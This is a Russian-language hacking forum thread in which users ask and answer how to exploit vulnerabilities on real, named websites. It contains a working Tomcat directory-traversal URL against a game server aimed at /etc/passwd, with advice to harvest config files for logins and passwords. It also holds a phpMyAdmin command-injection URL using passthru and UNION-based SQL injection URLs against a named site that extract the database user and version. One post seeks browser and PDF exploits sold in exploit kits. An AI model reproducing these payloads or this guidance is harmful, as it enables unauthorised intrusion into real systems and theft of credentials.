Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ^YaHoo^

    ^YaHoo^ Banned

    Joined:
    2 Jan 2009
    Messages:
    22
    Likes Received:
    26
    Reputations:
    0
    Здравствуйте нашел уязвимость Apache Tomcat v.5.5.26 Directory Traversal на одном игровом сервере http://la2midland.ru вот и мне сканер выдает такую строку http://la2midland.ru:80/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd что с этим можно сделать?
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ^YaHoo^ ну ты типо читаешь файлы на сервере, ищи конфигурационные файлы и бери оттуда логины и пассы
     
  3. ^YaHoo^

    ^YaHoo^ Banned

    Joined:
    2 Jan 2009
    Messages:
    22
    Likes Received:
    26
    Reputations:
    0
    спс)
     
  4. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Где он читает файлы? покажи мне содержимое файла..етс пассв который он прочитал?....Лично он мне ничего не выдал....
    Поэтому поиметь с этого ничего нельзя.
     
  5. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    в принципе в etc/passwd храняися пассы но зашифрование...
    так же можеш поискать такие полезности как:
    /etc/httpd/conf/httpd.conf
    /etc/php.ini
    /etc/hosts
    /etc/my.conf

    дальше сам гляди, у меня сайт вапще не открылся =/
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 -m0rgan- мне кажется что в etc/passwd нету ничего интересного, а пассы вроде в shadow хранятся

    2 DimOnOID ты прав, мне тоже ничего не выдало, но увидев /etc/passwd дал ответ иcxодя из собственных соображений
     
  7. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    /etc/passwd Уже стотыщь лет не хранит хешши паролей..и не обяз в папке /etc/ будут лежать эти файлы..на каждой машине они как правило по разному..

    Gorev угу..а на shadow прав не хватит.
     
  8. ^YaHoo^

    ^YaHoo^ Banned

    Joined:
    2 Jan 2009
    Messages:
    22
    Likes Received:
    26
    Reputations:
    0
    получается с этого поиметь ни чего нельзя да?
     
  9. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    По дефолту, а по дефолту чаще всего, они лежат в /etc/ =)

    >>/etc/passwd Уже стотыщь лет не хранит хешши паролей

    точно не знаюсь на апаче но что то там расшифровуют)
     
  10. H0ak1N

    H0ak1N Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    25
    Likes Received:
    7
    Reputations:
    1
    Скажите пожалуйста, есть ли в паблике эксплоиты Snapshot (ie6,ie7), util.printf (pdf), Collab.collectEmailInfo (pdf). Эксплоиты продаются в различных связках, но дата продаж - старая, а сплоиты актуальны. Черкните в ЛС, если кто может помочь.

    Общеобразовательный вопрос: как происходит внедрение ява-скрипт эксплоита в сам файл .pdf (к вопросу о pdf-эксплоитов)?
     
  11. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Code:
     Как использовать дыру в пхпмайадминке?:
    
    
    
    http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by=%22])%20OR%20passthru($_GET[ccmd]);%20//&sort_order=desc&token=[my_valid_token]&ccmd=ls
    
    
    Мне выдаёт в Доступе отказано.Че за токен ставить я не знаю =_=.Посему прописал так,как выше...Версия 2.9.1.1
    
    
     
    1 person likes this.
  12. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Там же вроде бы говорится о читалке, а не об инклуде.
     
    1 person likes this.
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    token - параметр в адресной строке. Например так - http://localhost/phpmyadmin/index.php?db=mysql&token=206136e5c98e1cd2fa26fbd104ebc700
     
  14. Stalingrad

    Stalingrad Elder - Старейшина

    Joined:
    17 Mar 2006
    Messages:
    49
    Likes Received:
    4
    Reputations:
    0
    http://comunist.md/index.php?idPaper=89/**/union+select+1,2,3,4,5,6,7+limit+1,1--

    Обьясните пожалуйста зачем ставить в конце запроса
    limit+1,1 . Почему не работает без LIMIT ?
    (когда не получилось руками запустил в програме Sql Injection tool , и там есть галочка типа - использовать Limit 1,1 )
     
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Всё отлично работает
    http://comunist.md/index.php?idPaper=-89 union select 1,2,concat_ws(0x3a,User(),Database(),Version()),4,5,6,7--+
     
    4 people like this.
  16. Stalingrad

    Stalingrad Elder - Старейшина

    Joined:
    17 Mar 2006
    Messages:
    49
    Likes Received:
    4
    Reputations:
    0
    А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 )

    И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?:
    Printable fields : {1},3,4,5,6,7
     
    #5816 Stalingrad, 11 Mar 2009
    Last edited: 11 Mar 2009
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 Jokester,что делать если в скуле урезаются длина запроса
     
  18. svesve

    svesve Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    574
    Likes Received:
    86
    Reputations:
    11
    Printable fields ( ака печатное поле)
    скобками ты выделяешь столбец в который выводить данные

    {1},3,4,5,6,7 - в перввый
     
  19. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    запроса или вывода ? если вывода то через substring ... а может я и ошибаюсь ...
     
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    вывода извиняюсь, через substring я знаю, есть ли другой способ?
     
Thread Status:
Not open for further replies.